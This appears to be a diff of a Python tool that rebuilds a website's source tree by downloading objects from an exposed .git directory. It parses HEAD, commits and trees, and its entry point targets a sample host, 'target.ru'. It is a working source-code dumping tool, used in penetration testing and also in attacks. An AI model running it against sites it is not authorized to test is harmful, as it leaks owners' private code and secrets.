| 1 | + | import binascii |
| 2 | + | import os |
| 3 | + | import time |
| 4 | + | import zlib |
| 5 | + | from collections import namedtuple |
| 6 | + | from typing import List, Tuple |
| 7 | + | from requests import Session |
| 8 | + | |
# One shared HTTP session used for every request made by this module.
session = Session()

# Mode strings that prefix entries inside a git tree object. Git writes them
# as ASCII octal without leading zeros: "40000" marks a sub-tree (directory)
# and "100644" marks a regular, non-executable file (blob).
ObjTypes = namedtuple("ObjTypes", ("TREE", "BLOB"))
object_types = ObjTypes("40000", "100644")
| 12 | + | |
| 13 | + | |
class RemoteGitObject:
    """A loose git object downloaded from a remote ``.git`` directory.

    The object is fetched and zlib-inflated when the instance is created.
    ``content`` holds everything after the first NUL byte of the inflated
    data, i.e. the payload without the leading object header.
    """

    type_: str
    content: bytes

    def __init__(self, url, obj_type=None):
        """Download and decode the object stored at ``url``.

        Args:
            url: Full URL of the loose object file.
            obj_type: Optional type tag kept on the instance as ``type_``.

        Raises:
            requests.HTTPError: If the server answers with an error status.
            zlib.error: If the response body is not valid zlib data.
            IndexError: If the inflated data contains no NUL separator.
        """
        self.url = url
        self.type_ = obj_type
        response = session.get(url)
        # Fail on HTTP errors here; otherwise an error page would be handed
        # to zlib and surface as a confusing decompression failure.
        response.raise_for_status()
        self.data_ = response.content
        inflated = zlib.decompress(self.data_)
        # Drop the header that precedes the first NUL byte.
        self.content = inflated.split(b'\x00', maxsplit=1)[1]

    def save(self, local_path: str):
        """Write the payload to ``local_path`` byte-for-byte.

        The file is always opened in binary mode. Decoding the payload and
        writing it in text mode would re-encode it with the platform's
        default encoding and translate newlines, which can corrupt the file
        or raise ``UnicodeEncodeError``.
        """
        with open(local_path, "wb") as file:
            file.write(self.content)
| 34 | + | |
| 35 | + | |
class RemoteGitTree(RemoteGitObject):
    """A remote git tree object, parsed into its list of entries.

    ``objects`` is a list of ``(mode, hex_hash, name)`` string tuples, one
    per entry found in the tree payload.
    """

    objects: List[Tuple]

    def __init__(self, url: str, obj_type=object_types.TREE):
        """Download the tree at ``url`` and parse its entries."""
        super().__init__(url, obj_type)
        self.objects = self._get_objects()

    def _get_objects(self) -> List[Tuple]:
        """Parse ``self.content`` into ``(mode, hex_hash, name)`` tuples.

        Each entry is read as: mode, one space, name, NUL byte, then 20 raw
        hash bytes.
        """
        entries = []
        remaining = self.content
        while remaining:
            # Split on the single separating space only. Splitting on
            # arbitrary whitespace would also swallow whitespace that
            # belongs to the start of the entry name.
            mode, remaining = remaining.split(b' ', maxsplit=1)
            name, remaining = remaining.split(b'\x00', maxsplit=1)
            raw_hash, remaining = remaining[:20], remaining[20:]
            hex_hash = binascii.hexlify(raw_hash)
            entries.append((mode.decode(), hex_hash.decode(), name.decode()))
        return entries

    def save(self, local_path: str):
        """Create the directory ``local_path`` that represents this tree.

        Missing parent directories are created as well.

        Raises:
            FileExistsError: If ``local_path`` already exists.
        """
        os.makedirs(local_path)
| 55 | + | |
| 56 | + | |
class RemoteGitDirectoryCrawler:
    """Download the working tree of HEAD from a remote ``.git`` directory.

    On construction the crawler resolves HEAD to a commit and loads that
    commit's root tree into ``current_tree``. ``crawl`` then walks the tree
    and writes every entry below a local directory.
    """

    url: str
    current_tree: "RemoteGitTree"

    def __init__(self, url: str):
        """Store the repository URL (minus one trailing slash) and load the root tree."""
        self.url = url[:-1] if url.endswith('/') else url
        self.current_tree = self._get_current_tree()

    def _get_base_url(self, path: str) -> str:
        """Return ``path`` (with one leading slash removed) joined onto the repository URL."""
        return f"{self.url}/{path[1:] if path.startswith('/') else path}"

    def _get_current_branch_url(self) -> str:
        """Return the URL of the ref file named by a symbolic HEAD.

        Raises:
            IndexError: If HEAD holds a single token, e.g. a detached HEAD.
        """
        resp_txt = session.get(self._get_base_url("HEAD")).text
        return self._get_base_url(resp_txt.split()[1])

    def _get_object_url(self, obj_hash: str) -> str:
        """Return the loose-object URL for ``obj_hash`` (``objects/<2 chars>/<rest>``)."""
        path = f"objects/{obj_hash[:2]}/{obj_hash[2:]}"
        return self._get_base_url(path)

    def _get_head_commit_hash(self) -> str:
        """Resolve HEAD to a commit hash, following one symbolic ref if present."""
        head = session.get(self._get_base_url("HEAD")).text.strip()
        if not head.startswith("ref:"):
            # Detached HEAD: the file holds the commit hash itself.
            return head
        ref_path = head.split()[1]
        return session.get(self._get_base_url(ref_path)).text.strip()

    def _get_current_tree(self) -> "RemoteGitTree":
        """Load the root tree of the commit that HEAD points to."""
        commit_hash = self._get_head_commit_hash()
        commit_obj = RemoteGitObject(self._get_object_url(commit_hash))
        commit_entries = commit_obj.content.decode("utf-8").split('\n')

        # The first line of the commit payload is read as "tree <hash>".
        tree_info = commit_entries[0]
        tree_hash = tree_info.split()[-1]
        return RemoteGitTree(self._get_object_url(tree_hash))

    @staticmethod
    def _is_excluded(name: str, exclude) -> bool:
        """Return True when the text after the last dot of ``name`` is in ``exclude``.

        Names without a dot are never excluded; an empty or ``None``
        ``exclude`` excludes nothing.
        """
        if not exclude:
            return False
        _stem, dot, ext = name.rpartition('.')
        return bool(dot) and ext in exclude

    @staticmethod
    def _is_safe_name(name: str) -> bool:
        """Return True when ``name`` is a single plain path component.

        Entry names come from the remote server, so anything that could
        escape the destination directory (separators, ``.``, ``..``, empty
        names) is rejected.
        """
        return name not in ("", ".", "..") and os.path.basename(name) == name

    def _crawl_wrapper(self, save_to: str, tree: "RemoteGitTree", level=0, exclude: List[str] = None):
        """Recursively download ``tree`` into ``save_to``.

        Yields ``(path, level)`` for each file just before it is written;
        the write happens when the generator is resumed. Files that already
        exist locally are skipped.

        Args:
            save_to: Local directory receiving the entries of ``tree``.
            tree: Tree whose ``objects`` are walked.
            level: Nesting depth, used for indentation and reported to the caller.
            exclude: Extensions (without the dot) to skip, or ``None``.
        """
        # The destination may not exist yet, most notably at the top level.
        os.makedirs(save_to, exist_ok=True)
        # Pause before each directory to throttle requests to the server.
        time.sleep(1)
        for type_, hash_, name in tree.objects:
            if not self._is_safe_name(name):
                print(f"{' ' * level} skipping unsafe name: {name!r}")
                continue

            save_pt = os.path.join(save_to, name)

            if self._is_excluded(name, exclude):
                print(f"{' ' * level} excluding: {save_pt}")
                continue

            object_url = self._get_object_url(hash_)
            if type_ == object_types.TREE:
                next_tree = RemoteGitTree(object_url)
                try:
                    next_tree.save(save_pt)
                except FileExistsError:
                    # Directory left over from an earlier run; reuse it.
                    pass
                # Delegate without rebinding this frame's save_pt/level, so
                # later siblings keep the correct depth.
                yield from self._crawl_wrapper(save_pt, next_tree, level + 1, exclude)
                continue
            if os.path.exists(save_pt):
                continue
            git_object = RemoteGitObject(object_url, obj_type=type_)
            yield save_pt, level
            git_object.save(save_pt)

            # Short pause between file downloads.
            time.sleep(0.3)

    def crawl(self, save_to: str, exclude: List[str] = None):
        """Download the current tree into ``save_to``, yielding ``(path, level)`` per file.

        Args:
            save_to: Local destination directory; created if missing.
            exclude: Extensions (without the dot) to skip, or ``None`` to keep everything.
        """
        yield from self._crawl_wrapper(save_to, self.current_tree, exclude=exclude)
| 120 | + | |
| 121 | + | |
if __name__ == "__main__":
    # Script entry point: crawl the hard-coded target repository into a
    # local directory, skipping common image extensions, and report each
    # path as the crawler yields it.
    skipped_extensions = ["jpg", "png", "jpeg", "gif", "ico"]
    crawler = RemoteGitDirectoryCrawler("https://target.ru/.git/")
    progress = crawler.crawl(save_to="./target/filesystem/", exclude=skipped_extensions)
    for saved_object_pt, dir_level in progress:
        indent = ' ' * dir_level
        print(f"{indent}saving: {saved_object_pt}")
    print("Done")
| 129 | + | |